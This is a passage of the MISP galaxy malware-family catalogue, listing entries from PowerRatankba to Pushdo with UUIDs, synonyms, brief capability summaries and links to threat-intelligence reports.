"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PowerRatankba.
Known Synonyms |
---|
QUICKRIDE.POWER |
Internal MISP references
UUID 606f778a-8b99-4880-8da8-b923651d627b
which can be used as unique global reference for PowerRatankba
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba - webarchive
- https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/ - webarchive
- https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/ - webarchive
- https://www.flashpoint-intel.com/blog/disclosure-chilean-redbanc-intrusion-lazarus-ties/ - webarchive
- https://content.fireeye.com/apt/rpt-apt38 - webarchive
- https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf - webarchive
- https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
prb_backdoor
Internal MISP references
UUID 2c9c42bc-8f26-4122-9454-a7eed8cd8886
which can be used as unique global reference for prb_backdoor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Predator The Thief
Predator is a feature-rich information stealer. It is sold on hacking forums as a bundle that includes a payload builder and a command-and-control web panel. It is able to grab passwords from browsers, replace cryptocurrency wallets, and take photos with the webcam. It is developed with a modular approach so that criminals can add more sophisticated tools on top of it.
Internal MISP references
UUID 54041c03-5714-4247-9226-3c801f59bc07
which can be used as unique global reference for Predator The Thief
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.predator - webarchive
- https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware - webarchive
- https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/paas-or-how-hackers-evade-antivirus-software/ - webarchive
- https://www.bleepingcomputer.com/news/security/fake-microsoft-teams-updates-lead-to-cobalt-strike-deployment/ - webarchive
- https://securelist.com/a-predatory-tale/89779 - webarchive
- https://www.fortinet.com/blog/threat-research/predator-the-thief-new-routes-delivery.html - webarchive
- https://fumik0.com/2018/10/15/predator-the-thief-in-depth-analysis-v2-3-5/ - webarchive
- https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-008.pdf - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-galleon - webarchive
- https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_4_ogawa-niseki_en.pdf - webarchive
- https://fumik0.com/2019/12/25/lets-play-again-with-predator-the-thief/ - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Prestige
According to PCrisk, Prestige is ransomware - malware that prevents victims from accessing (opening) their files by encrypting them. Additionally, Prestige appends the ".enc" extension to filenames and drops the "README" file containing a ransom note. An example of how this ransomware modifies filenames: it renames "1.jpg" to "1.jpg.enc", "2.png" to "2.png.enc", and so forth.
Internal MISP references
UUID 156b617e-2ae4-47a8-9498-6343b24cc6fe
which can be used as unique global reference for Prestige
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.prestige - webarchive
- https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/ - webarchive
- https://www.microsoft.com/security/blog/2022/10/14/new-prestige-ransomware-impacts-organizations-in-ukraine-and-poland/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Prikormka
Internal MISP references
UUID 00764634-4a21-4c5c-8b1f-fb294c9bdd3f
which can be used as unique global reference for Prikormka
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Prilex
Internal MISP references
UUID a0899fec-161d-4ba8-9594-8b5620c21705
which can be used as unique global reference for Prilex
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PrincessLocker
Internal MISP references
UUID 0714a7ad-45cb-44ec-92f9-2e839fd8a6b8
which can be used as unique global reference for PrincessLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker - webarchive
- https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/ - webarchive
- https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/ - webarchive
- https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PrivateLoader
According to sekoia, PrivateLoader is a modular malware whose main capability is to download and execute one or several payloads. The loader implements anti-analysis techniques, fingerprints the compromised host and reports statistics to its C2 server.
Internal MISP references
UUID dc62452c-a563-4a98-a4cd-174a7125e566
which can be used as unique global reference for PrivateLoader
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.privateloader - webarchive
- https://www.bitsight.com/blog/hunting-privateloader-malware-behind-installskey-ppi-service - webarchive
- https://www.youtube.com/watch?v=Ldp7eESQotM - webarchive
- https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/ - webarchive
- https://www.zscaler.com/blogs/security-research/peeking-privateloader - webarchive
- https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ - webarchive
- https://www.bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey - webarchive
- https://bitsight.com/blog/unveiling-socks5systemz-rise-new-proxy-service-privateloader-and-amadey - webarchive
- https://de.darktrace.com/blog/privateloader-network-based-indicators-of-compromise - webarchive
- https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1 - webarchive
- https://embee-research.ghost.io/identifying-privateloader-servers-with-censys/ - webarchive
- https://www.trendmicro.com/en_us/research/22/e/netdooka-framework-distributed-via-privateloader-ppi.html - webarchive
- https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f - webarchive
- https://intel471.com/blog/privateloader-malware - webarchive
- https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem - webarchive
- https://any.run/cybersecurity-blog/privateloader-analyzing-the-encryption-and-decryption-of-a-modern-loader/ - webarchive
- https://www.bitsight.com/blog/tracking-privateloader-malware-distribution-service - webarchive
- https://any.run/cybersecurity-blog/crackedcantil-breakdown/ - webarchive
- https://www.bitsight.com/blog/unpacking-colibri-loader-russian-apt-linked-campaign - webarchive
- https://tavares.re/blog/2022/06/06/hunting-privateloader-pay-per-install-service/ - webarchive
- https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PRIVATELOG
Malware that abuses the Common Log File System (CLFS) to store/hide a second stage payload via registry transaction files.
Internal MISP references
UUID 41bd3db9-a6f2-49b4-966a-3c710827fa82
which can be used as unique global reference for PRIVATELOG
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.privatelog - webarchive
- https://twitter.com/ESETresearch/status/1433819369784610828 - webarchive
- https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html - webarchive
- https://www.cybereason.com/blog/operation-cuckoobees-deep-dive-into-stealthy-winnti-techniques - webarchive
- https://www.cybereason.com/blog/operation-cuckoobees-a-winnti-malware-arsenal-deep-dive - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Project Hook POS
Internal MISP references
UUID d0c7815d-6039-436f-96ef-0767aabbdb36
which can be used as unique global reference for Project Hook POS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ProjectWood
Internal MISP references
UUID c8513379-2be1-4802-87b6-50482f4dabd7
which can be used as unique global reference for ProjectWood
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.project_wood - webarchive
- https://www.welivesecurity.com/en/eset-research/nspx30-sophisticated-aitm-enabled-implant-evolving-since-2005/ - webarchive
- https://www.sans.org/white-papers/33814/ - webarchive
- https://jsac.jpcert.or.jp/archive/2024/pdf/JSAC2024_1_2_facundo_en.pdf - webarchive
- https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Prometei (Windows)
According to Lior Rochberger (Cybereason), Prometei is a modular, multi-stage cryptocurrency-mining botnet. It was discovered in July 2020, and the Cybereason Nocturnus team found evidence that it has been evolving since 2016. Linux and Windows versions of this malware exist.
Internal MISP references
UUID eddb73d8-a33b-4cc6-b1d5-4697f2f4d0ee
which can be used as unique global reference for Prometei (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.prometei - webarchive
- https://twitter.com/honeymoon_ioc/status/1494016518694309896 - webarchive
- https://www.trendmicro.com/en_us/research/24/j/unmasking-prometei-a-deep-dive-into-our-mxdr-findings.html - webarchive
- https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html - webarchive
- https://blog.talosintelligence.com/prometei-botnet-improves/ - webarchive
- https://twitter.com/honeymoon_ioc/status/1494311182550904840 - webarchive
- https://www.cybereason.com/blog/prometei-botnet-exploiting-microsoft-exchange-vulnerabilities - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Prometheus
Ransomware written in .NET, apparently derived from the codebase of win.hakbit (Thanos) ransomware.
Internal MISP references
UUID 5b5f10bf-2bbe-4019-810c-69eba58ebc81
which can be used as unique global reference for Prometheus
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.prometheus - webarchive
- https://id-ransomware.blogspot.com/2021/05/prometheus-ransomware.html - webarchive
- https://unit42.paloaltonetworks.com/prometheus-ransomware/ - webarchive
- https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware - webarchive
- https://therecord.media/decryptor-released-for-prometheus-ransomware-victims/ - webarchive
- https://twitter.com/inversecos/status/1441252744258461699?s=20 - webarchive
- https://medium.com/s2wlab/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd - webarchive
- https://medium.com/cycraft/the-road-to-ransomware-resilience-c1ca37036efd - webarchive
- https://medium.com/cycraft/prometheus-decryptor-6933e7bac1ea - webarchive
- https://www.sentinelone.com/labs/spook-ransomware-prometheus-derivative-names-those-that-pay-shames-those-that-dont/ - webarchive
- https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
proteus
Internal MISP references
UUID 6d5724c6-646f-498a-b810-a6cee20f2b3c
which can be used as unique global reference for proteus
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Proto8RAT
Internal MISP references
UUID 2f5797e7-fe30-4d23-9fbe-4092d53b1660
which can be used as unique global reference for Proto8RAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ProtonBot
Internal MISP references
UUID 03f30d04-4568-4c4c-88d6-b62efc72f33a
which can be used as unique global reference for ProtonBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Prynt Stealer
Internal MISP references
UUID 09a1c6e8-c99f-4648-8210-08c25183f537
which can be used as unique global reference for Prynt Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.prynt_stealer - webarchive
- https://twitter.com/vxunderground/status/1519632014361640960 - webarchive
- https://www.zscaler.com/blogs/security-research/no-honor-among-thieves-prynt-stealers-backdoor-exposed - webarchive
- https://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PseudoManuscrypt
According to PCrisk, PseudoManuscrypt is the name of the malware that spies on victims. It is similar to another malware called Manuscrypt. We have discovered PseudoManuscrypt while checking installers for pirated software (one of the examples is a fake pirated installer for SolarWinds - a network monitoring software).
Internal MISP references
UUID bae89d64-30ce-4bfd-937b-0ec4ac846f60
which can be used as unique global reference for PseudoManuscrypt
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pseudo_manuscrypt - webarchive
- https://ics-cert.kaspersky.com/reports/2021/12/16/pseudomanuscrypt-a-mass-scale-spyware-attack-campaign/ - webarchive
- https://www.youtube.com/watch?v=uakw2HMGZ-I - webarchive
- https://medium.com/@lcam/updates-from-the-maas-new-threats-delivered-through-nullmixer-d45defc260d1 - webarchive
- https://www.bitsight.com/blog/zero-50k-infections-pseudomanuscrypt-sinkholing-part-1 - webarchive
- https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/ - webarchive
- https://asec.ahnlab.com/en/31683/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PsiX
According to Matthew Mesa, this is a modular bot. The name stems from the string PsiXMainModule, which appeared in binaries until mid-September 2018.
Apart from BotModule and MainModule, references to the following modules have been observed in binaries: BrowserModule, BTCModule, ComplexModule, KeyLoggerModule, OutlookModule, ProcessModule, RansomwareModule, SkypeModule.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PsiX.
Known Synonyms |
---|
PsiXBot |
Internal MISP references
UUID 416ae41e-17b2-46f6-847b-2831a0b3f8e9
which can be used as unique global reference for PsiX
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.psix - webarchive
- https://blog.fox-it.com/2019/03/27/psixbot-the-evolution-of-a-modular-net-bot/ - webarchive
- https://www.proofpoint.com/us/threat-insight/post/psixbot-continues-evolve-updated-dns-infrastructure - webarchive
- https://blog.comodo.com/comodo-news/versions-of-psixbot/ - webarchive
- https://twitter.com/mesa_matt/status/1035211747957923840 - webarchive
- https://www.proofpoint.com/us/threat-insight/post/psixbot-now-using-google-dns-over-https-and-possible-new-sexploitation-module - webarchive
- https://twitter.com/seckle_ch/status/1169558035649433600 - webarchive
- https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PSLogger
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PSLogger.
Known Synonyms |
---|
ECCENTRICBANDWAGON |
Internal MISP references
UUID 1b1d3548-08db-4dff-878f-77d2f0b69777
which can be used as unique global reference for PSLogger
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PC Surveillance System
Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PC Surveillance System.
Known Synonyms |
---|
PSS |
Internal MISP references
UUID e437f01c-8040-4098-a3fa-20154b58c928
which can be used as unique global reference for PC Surveillance System
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pteranodon
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Pteranodon.
Known Synonyms |
---|
Pterodo |
Internal MISP references
UUID d5138738-846e-4466-830c-cd2bb6ad09cf
which can be used as unique global reference for Pteranodon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon - webarchive
- https://ssu.gov.ua/uploads/files/DKIB/Technical%20report%20Armagedon.pdf - webarchive
- https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/ - webarchive
- https://www.elastic.co/blog/playing-defense-against-gamaredon-group - webarchive
- https://www.vkremez.com/2019/01/lets-learn-deeper-dive-into-gamaredon.html - webarchive
- https://threatmon.io/cybergun-technical-analysis-of-the-armageddons-infostealer/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military - webarchive
- https://www.bleepingcomputer.com/news/security/russian-gamaredon-hackers-use-8-new-malware-payloads-in-attacks/ - webarchive
- https://threatrecon.nshc.net/2019/06/11/sectorc08-multi-layered-sfx-recent-campaigns-target-ukraine/ - webarchive
- https://cert.gov.ua/news/46 - webarchive
- https://blogs.blackberry.com/en/2022/11/gamaredon-leverages-microsoft-office-docs-to-target-ukraine-government - webarchive
- https://blogs.cisco.com/security/network-footprints-of-gamaredon-group - webarchive
- https://www.welivesecurity.com/2020/06/11/gamaredon-group-grows-its-game - webarchive
- https://attack.mitre.org/groups/G0047 - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-intense-campaign-ukraine - webarchive
- https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021/ - webarchive
- https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations - webarchive
- https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution - webarchive
- https://unit42.paloaltonetworks.com/gamaredon-primitive-bear-ukraine-update-2021 - webarchive
- https://blog.threatstop.com/russian-apt-gamaredon-group - webarchive
- https://blog.yoroi.company/research/cyberwarfare-a-deep-dive-into-the-latest-gamaredon-espionage-campaign/ - webarchive
- https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine - webarchive
- https://cert.gov.ua/article/2807 - webarchive
- https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations/ - webarchive
- https://labs.sentinelone.com/pro-russian-cyberspy-gamaredon-intensifies-ukrainian-security-targeting/ - webarchive
- https://www.threatstop.com/blog/gamaredon-group-understanding-the-russian-apt - webarchive
- https://cert.gov.ua/news/42 - webarchive
- https://cert.gov.ua/article/10702 - webarchive
- https://threatmon.io/beyond-bullets-and-bombs-an-examination-of-armageddon-groups-cyber-warfare-against-ukraine/ - webarchive
- https://www.rnbo.gov.ua/files/2023_YEAR/CYBERCENTER/Gamaredon_activity.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PUBLOAD
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular PUBLOAD.
Known Synonyms |
---|
ClaimLoader |
PUBLOAD |
Internal MISP references
UUID db8f94e9-768d-4ad1-befb-55b4b820174f
which can be used as unique global reference for PUBLOAD
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pubload - webarchive
- https://blog.talosintelligence.com/2022/05/mustang-panda-targets-europe.html - webarchive
- https://www.trendmicro.com/en_us/research/22/k/earth-preta-spear-phishing-governments-worldwide.html - webarchive
- https://csirt-cti.net/2024/01/23/stately-taurus-targets-myanmar/ - webarchive
- https://unit42.paloaltonetworks.com/chinese-apts-target-asean-entities/ - webarchive
- https://www.welivesecurity.com/en/eset-research/separating-bee-panda-ceranakeeper-making-beeline-thailand/ - webarchive
- https://twitter.com/katechondic/status/1556940169483264000 - webarchive
- https://www.lac.co.jp/lacwatch/report/20221117_003189.html - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PubNubRAT
Internal MISP references
UUID bcc8e3ef-fc5e-4d44-9011-4d429bac0f26
which can be used as unique global reference for PubNubRAT
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Punkey POS
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Punkey POS.
Known Synonyms |
---|
poscardstealer |
pospunk |
punkeypos |
Internal MISP references
UUID 57a6dbce-2d8a-44ae-a561-282d02935698
which can be used as unique global reference for Punkey POS
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
pupy (Windows)
Pupy is an open-source, cross-platform RAT and post-exploitation framework written mainly in Python. Pupy can be loaded from various loaders, including PE EXE, reflective DLL, Linux ELF, pure Python, PowerShell and APK. Most of the loaders bundle an embedded Python runtime, Python library modules in source, compiled and native forms, and a flexible configuration. They bootstrap a Python runtime environment, mostly in memory, for the later stages of Pupy to run in. Pupy can communicate over various transports, migrate into processes, and load remote Python code, Python packages and Python C extensions from memory.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular pupy (Windows).
Known Synonyms |
---|
Patpoopy |
Internal MISP references
UUID 8a789016-5f8d-4cd9-ba96-ba253db42fd8
which can be used as unique global reference for pupy (Windows)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy - webarchive
- https://securityaffairs.co/wordpress/56348/intelligence/magic-hound-campaign.html - webarchive
- https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/ - webarchive
- https://www.infinitumit.com.tr/apt-35/ - webarchive
- https://documents.trendmicro.com/assets/txt/earth-berberoka-linux-iocs-2.txt - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2020-0123.pdf - webarchive
- https://documents.trendmicro.com/assets/white_papers/wp-operation-earth-berberoka.pdf - webarchive
- https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/ - webarchive
- https://go.recordedfuture.com/hubfs/reports/cta-2022-0330.pdf - webarchive
- https://symantec-blogs.broadcom.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations - webarchive
- https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage - webarchive
- https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/ - webarchive
- https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf - webarchive
- https://cyble.com/blog/analysing-the-utg-q-010-campaign/ - webarchive
- https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html - webarchive
- https://github.com/n1nj4sec/pupy - webarchive
- https://labs.k7computing.com/index.php/pupy-rat-hiding-under-werfaults-cover/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PureCrypter
According to Zscaler, PureCrypter is a fully featured loader sold since at least March 2021. It has been observed distributing a variety of remote access trojans and information stealers. The loader is a .NET executable obfuscated with SmartAssembly that uses compression, encryption and obfuscation to evade antivirus products. Its persistence, injection and defense mechanisms are configurable via Google's Protocol Buffer message format.
Internal MISP references
UUID 554993dc-2a30-43d9-ac96-fc9b9cca29f6
which can be used as unique global reference for PureCrypter
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.purecrypter - webarchive
- https://www.prodaft.com/m/reports/RIG___TLP_CLEAR-1.pdf - webarchive
- https://any.run/cybersecurity-blog/pure-malware-family-analysis/ - webarchive
- https://blog.sekoia.io/mallox-ransomware-affiliate-leverages-purecrypter-in-microsoft-sql-exploitation-campaigns/ - webarchive
- https://www.zscaler.com/blogs/security-research/technical-analysis-purecrypter - webarchive
- https://blog.netlab.360.com/purecrypter-is-busy-pumping-out-various-malicious-malware-families/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PureLocker
Ransomware.
Internal MISP references
UUID 7a0f3f15-6920-4bc0-baa1-17dd8263948e
which can be used as unique global reference for PureLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.purelocker - webarchive
- https://www.intezer.com/blog-purelocker-ransomware-being-used-in-targeted-attacks-against-servers/ - webarchive
- https://exchange.xforce.ibmcloud.com/collection/99c7156cff70e1d8e1687ab7dadc8c0e - webarchive
- https://github.com/albertzsigovits/malware-notes/blob/master/PureLocker.md - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PureLogs Stealer
PureLogs, also known as PureLog Stealer, is an infostealer malware from the Pure family that aims to steal sensitive information from infected devices.
Internal MISP references
UUID 02cd0480-5de3-4a61-9df8-376a4202b66b
which can be used as unique global reference for PureLogs Stealer
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.purelogs - webarchive
- https://cyble.com/blog/pure-coder-offers-multiple-malware-for-sale-in-darkweb-forums/ - webarchive
- https://russianpanda.com/2023/12/26/Pure-Logs-Stealer-Malware-Analysis/ - webarchive
- https://cloud.google.com/blog/topics/threat-intelligence/russian-espionage-influence-ukrainian-military-recruits-anti-mobilization-narratives?hl=en - webarchive
- https://any.run/cybersecurity-blog/pure-malware-family-analysis/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PurpleFox
Purple Fox uses the msi.dll function 'MsiInstallProductA' to download and execute its payload. The payload is a .msi file that contains encrypted shellcode in both 32-bit and 64-bit versions. Once executed, the system is restarted and the 'PendingFileRenameOperations' registry key is used to rename its components.
Upon restart, the rootkit capability of Purple Fox is invoked. It creates a suspended svchost process and injects a DLL that creates a driver with the rootkit capability.
The latest version of Purple Fox abuses open-source code to enable its rootkit components, which include hiding and protecting its files and registry entries. It also abuses a file utility to hide its DLL component, which deters reverse engineering.
Internal MISP references
UUID 31638e2b-1c6b-47b9-bbb9-7316f206b354
which can be used as unique global reference for PurpleFox
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.purplefox - webarchive
- https://blogs.blackberry.com/en/2022/01/threat-thursday-purple-fox-rootkit - webarchive
- https://www.bleepingcomputer.com/news/security/purplefox-malware-infects-thousands-of-computers-in-ukraine/ - webarchive
- https://thehackernews.com/2022/03/purple-fox-hackers-spotted-using-new.html - webarchive
- https://threatresearch.ext.hp.com/purple-fox-exploit-kit-now-exploits-cve-2021-26411/ - webarchive
- https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/security-101-the-impact-of-cryptocurrency-mining-malware - webarchive
- https://blog.malwarebytes.com/trojans/2021/03/perkiler-malware-turns-to-smb-brute-force-to-spread/ - webarchive
- https://twitter.com/C0rk1_H/status/1412801973628272641?s=20 - webarchive
- https://www.trendmicro.com/en_us/research/21/l/a-look-into-purple-fox-server-infrastructure.html - webarchive
- https://www.trendmicro.com/en_in/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html - webarchive
- https://s.tencent.com/research/report/1322.html - webarchive
- https://labs.sentinelone.com/purple-fox-ek-new-cves-steganography-and-virtualization-added-to-attack-flow/ - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/Technical%20Brief%20-%20A%20Look%20Into%20Purple%20Fox%E2%80%99s%20New%20Arrival%20Vector.pdf - webarchive
- https://www.guardicore.com/labs/purple-fox-rootkit-now-propagates-as-a-worm/ - webarchive
- https://www.thecybersecuritytimes.com/purple-fox-malware-is-actively-distributed-via-telegram-installers/ - webarchive
- https://www.trendmicro.com/en_us/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal.html - webarchive
- https://www.trendmicro.com/en_us/research/21/g/purplefox-using-wpad-to-targent-indonesian-users.html - webarchive
- https://blog.minerva-labs.com/malicious-telegram-installer-drops-purple-fox-rootkit - webarchive
- https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/ - webarchive
- https://www.trendmicro.com/en_us/research/21/j/purplefox-adds-new-backdoor-that-uses-websockets.html - webarchive
- https://nao-sec.org/2021/04/exploit-kit-still-sharpens-a-sword.html - webarchive
- https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape - webarchive
- https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/purple-fox-uses-new-arrival-vector-and-improves-malware-arsenal/IOCs-Purple-Fox.txt - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
purpleink
Internal MISP references
UUID dce38032-f18c-46a6-8e64-d7c0bbbed1f0
which can be used as unique global reference for purpleink
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
PurpleWave
Zscaler reported on a new infostealer called PurpleWave, which is written in C++ and silently installs itself onto a user's system. It connects to a command and control (C&C) server to send system information and installs new malware onto the infected system.
The author of this malware is advertising and selling PurpleWave stealer on Russian cybercrime forums for 5,000 RUB (US$68) with lifetime updates and 4,000 RUB (US$54) with only two updates.
Internal MISP references
UUID 0b63109b-0b4d-4f5d-a475-c91af4eed857
which can be used as unique global reference for PurpleWave
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Pushdo
Pushdo is usually classified as a "downloader" trojan, meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, and Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than in the trojan itself.
Internal MISP references
UUID b39ffc73-db5f-4a8a-acd2-bee958d69155
which can be used as unique global reference for Pushdo
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo - webarchive
- https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf - webarchive
- https://www.secureworks.com/research/pushdo - webarchive
- https://www.shadowserver.org/news/has-the-sun-set-on-the-necurs-botnet/ - webarchive
- http://www.secureworks.com/research/threat-profiles/gold-essex - webarchive
- https://www.secureworks.com/research/threat-profiles/gold-essex - webarchive
